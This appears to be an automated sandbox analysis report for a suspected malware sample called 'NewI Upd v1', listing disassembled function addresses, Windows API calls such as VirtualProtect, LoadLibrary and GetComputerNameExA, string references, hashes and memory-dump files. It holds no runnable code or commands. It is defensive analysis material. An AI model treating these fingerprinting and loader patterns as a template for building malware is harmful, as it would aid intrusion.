Opcode Fuzzy Hash: 97f55433c743f21062d8074e2e62384338da04d732f7d2539c9287f36ad6d8c9
Instruction Fuzzy Hash: 2E5169306083149FDB28AF24D85173BB791EB99704F15993EDAC68B395EB359C018BCA

Function 0089AA40 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 94
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00898900: EnterCriticalSection.KERNEL32(?,?,00886BD0,00000000,4903A6BA), ref: 0089890F

VirtualProtect.KERNELBASE(008C2000,00000080,00000004,?), ref: 0089AA79
VirtualProtect.KERNELBASE(008C2000,00000080,00000002,?), ref: 0089AB45

Strings

minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp, xrefs: 0089AAD0, 0089AB20
cached_fp == new_fp, xrefs: 0089AB0F
%ls, xrefs: 0089AAC4, 0089AB14
cached_fp == invalid_function_sentinel(), xrefs: 0089AABF

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ProtectVirtual$CriticalEnterSection
String ID: %ls$cached_fp == invalid_function_sentinel()$cached_fp == new_fp$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
API String ID: 2249083135-1239448957
Opcode ID: 9c69ed30376910199c349b5c25f886a505f5ef74d9cd1bbdba2e2a71c28655a1
Instruction ID: 506b5dd8ba12042c3e93b7b516de9e714825ee5f1d44b9182ecb1851d36ce190
Opcode Fuzzy Hash: 9c69ed30376910199c349b5c25f886a505f5ef74d9cd1bbdba2e2a71c28655a1
Instruction Fuzzy Hash: D131AB71A40208BBEF14FBA49C46BAE7374FB04704F184518F505E62C2EA749A44CBA3

Function 0040A720 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(871F8513,00000000,$]&'), ref: 0040A806
LoadLibraryExW.KERNEL32(871F8513,00000000,$]&'), ref: 0040A8E6

Strings

y{, xrefs: 0040A867
$]&', xrefs: 0040A778, 0040A802

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: LibraryLoad
String ID: $]&'$y{
API String ID: 1029625771-3391858690
Opcode ID: 17b36d51e0ac5e8904d019b0b3b10d454229c9f459bb54c4a2b95b49de90bb6c
Instruction ID: e3df6dd21aead34a5ddf479ffdd5a6ce57bb8df0ae66d66699a64dbdd06f65bd
Opcode Fuzzy Hash: 17b36d51e0ac5e8904d019b0b3b10d454229c9f459bb54c4a2b95b49de90bb6c
Instruction Fuzzy Hash: 70410872A583418FC314CF66DC8135B7BE1EFD5644F588A3DE5D4AB306C238D9468B89

Function 0042CAC5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,59243E10,00000100), ref: 0042CBE1

Strings

qrax, xrefs: 0042CB1F

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: ComputerName
String ID: qrax
API String ID: 3545744682-2273969971
Opcode ID: cfc1c4edb5714c352d0b7799d246ee133a48a9aa66d1fbdeee6a3e77d77983b9
Instruction ID: 0167a9b6021f4b487e69d1f3e6896f0ceb7bdb3d7afb1a3d3b8653f417f13fe5
Opcode Fuzzy Hash: cfc1c4edb5714c352d0b7799d246ee133a48a9aa66d1fbdeee6a3e77d77983b9
Instruction Fuzzy Hash: 2E31F83160C3A18BD73DCB35A8527EB7EE2AB96304F58486ED4CD97281C7780805C746

Function 00898CB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 00898CD1

Strings

minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp, xrefs: 00898CBA

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
API String ID: 4219598475-534659383
Opcode ID: 56b13d9b1d6540fe1b07a5a21e7e72d328017a15b76c36cbcca3d6efb9bcf7f7
Instruction ID: e29d1c31dc1cbc45d172f79bebeab3683d9052b328dc31dcd14a57762e8b9b05
Opcode Fuzzy Hash: 56b13d9b1d6540fe1b07a5a21e7e72d328017a15b76c36cbcca3d6efb9bcf7f7
Instruction Fuzzy Hash: 3F418DB0A04249EBCB14DBA8C591BADBBB1FF55304F244298E415AB3C2DB749F06DB85

Function 0042CC22 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042CD31

Strings

f]_b, xrefs: 0042CC63

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: ComputerName
String ID: f]_b
API String ID: 3545744682-3321007055
Opcode ID: 63e8941449bdf5ddd9fd9be881f9d855e558bfba7b7becb1fbc36d7e6a866b21
Instruction ID: 7d6d5cbb6e4fb84516c702973aec74be959b20b533d94bcf0e52b15756506411
Opcode Fuzzy Hash: 63e8941449bdf5ddd9fd9be881f9d855e558bfba7b7becb1fbc36d7e6a866b21
Instruction Fuzzy Hash: 6531F73160C7D187C738CF29D4543AFBBE1AB96300F598A6ED8DE9B291D6384805CB96

Function 0042CAC3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,59243E10,00000100), ref: 0042CBE1

Strings

qrax, xrefs: 0042CB1F

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: ComputerName
String ID: qrax
API String ID: 3545744682-2273969971
Opcode ID: a043a667c01180c8ba7fcc8cc39c401d7f63847099e373e9caba9d9b001794bd
Instruction ID: 9e8df55d72fc4f27b5093f83553ed601aa874f229f263047e210e2eec0278285
Opcode Fuzzy Hash: a043a667c01180c8ba7fcc8cc39c401d7f63847099e373e9caba9d9b001794bd
Instruction Fuzzy Hash: 7021F971A0C2A08BD73DCB35A8527EB7EE2AB96304F58496ED4CD97285CB780805CB46

Function 0042CA7D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,59243E10,00000100), ref: 0042CBE1

Strings

qrax, xrefs: 0042CB1F

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: ComputerName
String ID: qrax
API String ID: 3545744682-2273969971
Opcode ID: 55f357b8af4f96e646fe5e1187b562cc3c3eafd99f69352663d02ba7049afee4
Instruction ID: 69c93b51afbc2c56b05141490a65bd474c0686f8db416358aeb08c4c860a9c5c
Opcode Fuzzy Hash: 55f357b8af4f96e646fe5e1187b562cc3c3eafd99f69352663d02ba7049afee4
Instruction Fuzzy Hash: C9210B71A4C3608BD72DCB35A8527EF7AD2ABDA304F58896ED4CD97285C7780806C746

Function 0042CC20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042CD31

Strings

f]_b, xrefs: 0042CC63

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: ComputerName
String ID: f]_b
API String ID: 3545744682-3321007055
Opcode ID: d3dc80f6c9128e7c424dd9ab0e4ab253bcf05ad676c5c15958230d0d5b169cad
Instruction ID: dd750e6c39310e932b229fae9fd23de387e6960b7fd66d11589cb358dcc17d95
Opcode Fuzzy Hash: d3dc80f6c9128e7c424dd9ab0e4ab253bcf05ad676c5c15958230d0d5b169cad
Instruction Fuzzy Hash: C621493261C3A047C738CF2594553AFBBE59B86300F1A8A2ED8DED7290D63848058B82

Function 0043D546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043D5D4

Strings

QTUJ, xrefs: 0043D555

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: ForegroundWindow
String ID: QTUJ
API String ID: 2020703349-1753559080
Opcode ID: caa38410d6362b7e2781d24cd048d0fc4bb610ba9aaad93a4a2b8ce0973bae98
Instruction ID: 12241391e6e0d675f68865a2a455c1658f714c72f69ec7f1b1dc3a4f67ff28e1
Opcode Fuzzy Hash: caa38410d6362b7e2781d24cd048d0fc4bb610ba9aaad93a4a2b8ce0973bae98
Instruction Fuzzy Hash: 63F08B76E041208FD7048B38FD1116B7BD1EB9D328F14047DD986E3342FA2AEC004645

Function 0087CF80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

___scrt_get_show_window_mode.LIBCMTD ref: 0087CF86

Part of subcall function 0087DA90: GetStartupInfoW.KERNEL32(?), ref: 0087DAAA

Strings

=, xrefs: 0087CFA3

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: InfoStartup___scrt_get_show_window_mode
String ID: =
API String ID: 2456344720-2322244508
Opcode ID: 1b67b5579d8329662fb01de1e34a13c1f642e984faacb80c8ed7d16d60ebfcdf
Instruction ID: dc67808e28f226953d88e1bd541bd7714236f290c9df84b0d6226dfb88c11729
Opcode Fuzzy Hash: 1b67b5579d8329662fb01de1e34a13c1f642e984faacb80c8ed7d16d60ebfcdf
Instruction Fuzzy Hash: 0DD05E74D08208BBCB00FFE89903B6EB7B9EF84701F1081A9B948E7285DA305A0047E6

Function 0040CA26 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040CA2A
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CB6F

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6b5866ac08ddccdaa040d85288ab6eedac2a97b343cd52a6ffb6868d15961427
Instruction ID: 8e828c29e923620a846d7a117d422454df9fb1543af375fc57d9ca7a34f1b82a
Opcode Fuzzy Hash: 6b5866ac08ddccdaa040d85288ab6eedac2a97b343cd52a6ffb6868d15961427
Instruction Fuzzy Hash: 9E41A8B4D10B40AFD370EF399A0B7137EB8AB05250F504B1DF9EA866D4E631A4198BD7

Function 008BFFF8 Relevance: 1.6, APIs: 1, Instructions: 111libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 008C0193

Memory Dump Source

Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4145397a475e41d1b508e212315727e0f51c07c471cf77535c3cdeef071d81e1
Instruction ID: c3846fe1ce84e31e3b76828b76728673a3700837dcc395d4b93a7d0ecc28803b
Opcode Fuzzy Hash: 4145397a475e41d1b508e212315727e0f51c07c471cf77535c3cdeef071d81e1
Instruction Fuzzy Hash: 7A41B824E14248D6EB14DFE4D4407EEB772FF68700F10A42EE109EB3A4E77A4A55C76A

Function 008C0478 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 008BFFF8: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 008C0193

LoadLibraryA.KERNELBASE(008BF9EF,00000000,00000001,5FBFF0FB,?,?,?,?,008BF9EF), ref: 008C04D5

Memory Dump Source

Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 81b1951c4f8b689c6a5172aab15668dca1c8adb7f196ad730add9b9f0a925985
Instruction ID: 33c5db8fe50cc049b239164793d872d153bfc0b9717b10f5b26eb7041eea888f
Opcode Fuzzy Hash: 81b1951c4f8b689c6a5172aab15668dca1c8adb7f196ad730add9b9f0a925985
Instruction Fuzzy Hash: A241A474D00209EFDB04DFA8C885BAEBBB5FF48304F248569E915AB391D634AA41CF94

Function 0043D3C0 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043D412

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c21e41c6bd38deb5ea5312784eae02f942487d96a6033d800d82d3d61e00fd3e
Instruction ID: 510512eece773e6f5c64cee0adce13cf76fbeb64dad2ee14164a77c3d514b742
Opcode Fuzzy Hash: c21e41c6bd38deb5ea5312784eae02f942487d96a6033d800d82d3d61e00fd3e
Instruction Fuzzy Hash: A7F02776428510EBC7002F29BC01B5F3674EF8F315F021C7AF50092021DF38E811869E

Function 00430B0D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00430B58

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 635abcd66c4883146a118ed6d99ccec43bd829c4c1058ffb99e9fb087cde3606
Instruction ID: ae0561bf8d03d0918291b0c09ff7b0191706d0e751dad2fbabe343bae13c870a
Opcode Fuzzy Hash: 635abcd66c4883146a118ed6d99ccec43bd829c4c1058ffb99e9fb087cde3606
Instruction Fuzzy Hash: DCF0BDB46097019FE354DF24D1A8B1ABBF0FB85304F51881CE5958B7A0C7B5A949CF81

Function 0043292E Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00432975

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 53f07526de11ec8eb39bfde5d1805764de1141446b73d4ea1bd21fc4319eb0db
Instruction ID: ed97f4dbe1278d6c45ab567331afad76ae0e8fba7be42d60f8fb070859edbc4f
Opcode Fuzzy Hash: 53f07526de11ec8eb39bfde5d1805764de1141446b73d4ea1bd21fc4319eb0db
Instruction Fuzzy Hash: 77F07AB85093428FE364DF65D5A871BBBE0AB84304F50891CE5998B390DBB59548CF82

Function 0043BB00 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043D42B,?,?,00000000,0040B781,00000000,0040B83E), ref: 0043BB1E

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: db633168f8c21f0cae4d50c191f45329c4a74bfbb9680dbf52beb06cef25602e
Instruction ID: 88b7f03c1a7c2d10820dd94022e2ca5147a15a3cf94d0c22ebd4d2dfa83fc049
Opcode Fuzzy Hash: db633168f8c21f0cae4d50c191f45329c4a74bfbb9680dbf52beb06cef25602e
Instruction Fuzzy Hash: C7D0C735549232DFD6105F25FC15B5A3758EF0A721F034975B404EB171C665EC9186D8

Function 0089B130 Relevance: 1.5, APIs: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(008C2000,00000080,00000002,?), ref: 0089B148

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 83e180ed8fbac945f99405b2f967c15d03f8a0fcbc4ddc79a98aac3623f5d071
Instruction ID: 66d91e7f268b3cbe5d0e8da1e02aabfa668d55cf4518b7e22364ebbd64313b56
Opcode Fuzzy Hash: 83e180ed8fbac945f99405b2f967c15d03f8a0fcbc4ddc79a98aac3623f5d071
Instruction Fuzzy Hash: 0BE0C22054C38C76EB1096A06C0ABAD7E68AB02701F0841E5E998E62C2DAB6850983A2

Function 0040CBAB Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CBBD

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 9410caf73d232eab293d7096ef6603a5848f4996e7a608dcf9588174b511f8a0
Instruction ID: 37668fcd30a43b4758009cf2ebf0c8edf6bf0a2687c61c663b4554830839dde7
Opcode Fuzzy Hash: 9410caf73d232eab293d7096ef6603a5848f4996e7a608dcf9588174b511f8a0
Instruction Fuzzy Hash: DCD092383D43017AE2644748AD13F1022519782F25F740228B322FE6E0C9E06110860C

Function 0043BAE0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,E6E1F76B,00408A4F,E6E1F76B), ref: 0043BAF0

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f29e08a307264fb46de45dc966fd7f8d7542f1aa59cde5a70b8e616d6b0b4187
Instruction ID: 402e31a7dab22b6b605735be1966a6062c99328233f95053d8096e354e58f3a9
Opcode Fuzzy Hash: f29e08a307264fb46de45dc966fd7f8d7542f1aa59cde5a70b8e616d6b0b4187
Instruction Fuzzy Hash: D7C04C31045120AACA502B25EC05B8A3A54AF45351F060495B004660B1C661AC868699

Non-executed Functions

Function 004123D0 Relevance: 123.4, Strings: 97, Instructions: 2107COMMON

Download Yara Rule

Strings

~, xrefs: 0041383D
h, xrefs: 00412D54
w, xrefs: 00414344
u, xrefs: 00414439
w, xrefs: 00413F49
f, xrefs: 004125B7
+, xrefs: 00412E7C
c, xrefs: 00412C7C
